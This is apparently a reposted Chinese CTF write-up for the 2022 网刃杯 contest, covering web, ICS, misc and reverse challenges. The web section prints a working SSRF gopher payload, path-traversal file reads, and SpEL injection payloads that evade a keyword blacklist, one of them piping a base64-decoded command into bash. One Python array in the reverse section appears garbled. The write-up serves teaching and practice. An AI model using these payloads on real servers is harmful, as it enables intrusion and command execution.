2022网刃杯-WriteUp

admin 2022年5月16日10:16:58CTF专场评论23 views5758字阅读19分11秒阅读模式

Web


Sign_in

解题思路

2022网刃杯-WriteUp


ssrf+gopher 满足条件即可

gopher://172.73.23.100:80/_POST / HTTP/1.1
Host: 172.73.23.100:80
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For:127.0.0.1
Referer: bolean.club
Content-Length: 3

b=1

转换一下成gopher格式,记得url编码

upload

解题思路

文件名处存在注入

2022网刃杯-WriteUp

2022网刃杯-WriteUp

2022网刃杯-WriteUp

select flag from flag 去查吧

ez_java

解题思路

http://124.220.9.19:8022/download?filename=../../../web.xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">

    <servlet>
        <servlet-name>DownloadServlet</servlet-name>
        <servlet-class>com.abc.servlet.DownloadServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>DownloadServlet</servlet-name>
        <url-pattern>/download</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>TestServlet</servlet-name>
        <servlet-class>com.abc.servlet.TestServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>TestServlet</servlet-name>
        <url-pattern>/test388</url-pattern>
    </servlet-mapping>

</web-app>

com.abc.servlet.TestServlet.class 直接读取http://124.222.173.163:8024/download?filename=../../../classes/com/abc/servlet/TestServlet.class

//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//
package com.abc.servlet;
import java.io.IOException;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.springframework.expression.Expression;
import org.springframework.expression.ParserContext;
import org.springframework.expression.common.TemplateParserContext;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.StandardEvaluationContext;
public class TestServlet extends HttpServlet {
public TestServlet() {
}
protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
this.doPost(req, resp);
}
protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
try {
String name = request.getParameter("name");
name = new String(name.getBytes("ISO8859-1"), "UTF-8");
if (this.blackMatch(name)) {
request.setAttribute("message", "name is invalid");
request.getRequestDispatcher("/message.jsp").forward(request, response);
return;
}
System.out.println(name);
String message = this.getAdvanceValue(name);
request.setAttribute("message", message);
request.getRequestDispatcher("/message.jsp").forward(request, response);
} catch (Exception var5) {
request.setAttribute("message", "error");
request.getRequestDispatcher("/message.jsp").forward(request, response);
}
}
private boolean blackMatch(String val) {
String[] var2 = this.getBlacklist();
int var3 = var2.length;
for(int var4 = 0; var4 < var3; ++var4) {
String keyword = var2[var4];
Matcher matcher = Pattern.compile(keyword, 34).matcher(val);
if (matcher.find()) {
return true;
}
}
return false;
}
private String getAdvanceValue(String val) {
ParserContext parserContext = new TemplateParserContext();
SpelExpressionParser parser = new SpelExpressionParser();
Expression exp = parser.parseExpression(val, parserContext);
StandardEvaluationContext evaluationContext = new StandardEvaluationContext();
return exp.getValue(evaluationContext).toString();
}
private String[] getBlacklist() {
return new String[]{"java.+lang", "Runtime", "exec.*\("};
}
}

常规的 spel注入 ban了 "java.+lang", "Runtime", "exec.*("}

使用 runtime 会显示 Process[pid=51, exitValue="not exited"]

#{T(String).getClass().forName("java.l"%2b"ang.Ru"%2b"ntime").getMethod("ex"%2b"ec",T(String[])).invoke(T(String).getClass().forName("java.l"%2b"ang.Ru"%2b"ntime").getMethod("getRu"%2b"ntime").invoke(T(String).getClass().forName("java.l"%2b"ang.Ru"%2b"ntime")),new String[]{"whoami"})}

2022网刃杯-WriteUp

猜测可能线程之类的问题,使用 ProcessBuilder 试一下可以执行,但是只能读一行,直接base64一下

name=#{new java.io.BufferedReader(new java.io.InputStreamReader(new ProcessBuilder(new String[]{"bash","-c","{echo,bHMgL3xiYXNlNjQ=}|{base64,-d}|{bash,-i}"}).start().getInputStream(), "gbk")).readLine()


2022网刃杯-WriteUp

2022网刃杯-WriteUp

name=#{new java.io.BufferedReader(new java.io.InputStreamReader(new ProcessBuilder(new String[]{"cat","/f1AgJvav"}).start().getInputStream(), "gbk")).readLine()}

2022网刃杯-WriteUp

flag{123awerghjvxcvcjfreawe}

ICS

carefulguy

解题思路

2022网刃杯-WriteUp

逐条跟一下tcp,直到tcp.stream eq 24,发现如上字段,这个忽略然后后面还有一部分

获取之前的数据,拼接在一起,是16进制解码得到flag

2022网刃杯-WriteUp


xyp07

解题思路

压缩包下载下来被加密了,发现

2022网刃杯-WriteUp

存在一个base64,盲猜密码

多次解密得到Xyp77&7&77

跟踪TCP找到

2022网刃杯-WriteUp

为base91编码

2022网刃杯-WriteUp

解码得到flag

welcome_S7_world_xyp07

easyice

题目附件

解题思路

直接追踪tcp流就能直接找到flag

图片

flag{e45y_1eci04}


移动的黑客

解题思路

题目下载后无法打开文件,丢online修复发现内容出错,丢hex检查文件发现头被改了,将FF FF FF FF改为0A 0D 0D 3C 完成修复,参考其他赛题的头

2022网刃杯-WriteUp 随后打开流量包,根据题意找到最新出故障的包

发动机最多能接受10000转/分钟的转速

所以定位data 10000附近的包

因为这里的data是16进制所以要转10进制2766 = 10086

flag{data+包号}

2022网刃杯-WriteUp

flag{1008668156}


MISC

玩坏得winxp

解题思路

下载完虚拟机打开报错

百度搜到 :txt打开 vmx文件

加入scsi0:0.fileName = " vmdk文件路径"

打开会提示选择vmdk文件位置 选择后

不会报错 直接进去

打开以后 有个文件夹 隐藏文件meiren.png

binwalk分离 再分离

提示 密码在带围脖的软件里

2022网刃杯-WriteUp

得到图片 f1ag.png

2022网刃杯-WriteUp

压缩包 41Z7.ZIP

2022网刃杯-WriteUp

火狐打不开 下载 一个xp安装包覆盖安装 打开看收藏夹

看到一个QQ 搜索进空间

2022网刃杯-WriteUp


2022网刃杯-WriteUp

2022网刃杯-WriteUp

2022网刃杯-WriteUp

Reverse

freestyle

解题思路

2022网刃杯-WriteUp

可以看到程序逻辑,两个fun函数,而且最后说了md5格式

看一下两个函数

2022网刃杯-WriteUp

2022网刃杯-WriteUp

箭头处是两个函数的核心,计算一下数学问题就行

两个func函数,简单的数学计算,结果进行md5,3327和105,

计算md5值加上flag{31a364d51abd0c8304106c16779d83b1}

Re_function

解题思路

花指令nop掉

2022网刃杯-WriteUp

2022网刃杯-WriteUp

2022网刃杯-WriteUp

a = [100113,  84,  84100120116120100,  65,
   64,  72112109,  24,  74,  65120102114,
   65120,  94,  78,  93,  82,  14,  61]
for i in range(0,len(a),1):
   if(i%2==0):
      print(chr((a[i]^0x37)&0xff),end="")
   else:
      print(chr(a[i]),end="")
# SqcTSxCxSAwHGm/JvxQrvxiNjR9=

2022网刃杯-WriteUp

换表解密

2022网刃杯-WriteUp

flag{we1come_t0_wrb}

定时启动

解题思路

2022网刃杯-WriteUp

启动程序发现

2022网刃杯-WriteUp

要求在指定时间打卡

2022网刃杯-WriteUp

得到flag

flag{c4c728s9ccbc87e4b5ce2f}

ez_algorithm

解题思路

2022网刃杯-WriteUp

2022网刃杯-WriteUp

patch成这样

然后输入以后他就会把加密的结果给你,与BRUF{E6oU9Ci#J9+6nWAhwMR9n:}按位比对加上亿点点合理的猜测,不用逆向就能拿到flag

flag{w3Lc0mE_t0_3NcrYPti0N:}



end


招新小广告

ChaMd5 Venom 招收大佬入圈

新成立组IOT+工控+样本分析 长期招新

欢迎联系[email protected]



2022网刃杯-WriteUp

原文始发于微信公众号(ChaMd5安全团队):2022网刃杯-WriteUp

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月16日10:16:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  2022网刃杯-WriteUp http://cn-sec.com/archives/951472.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: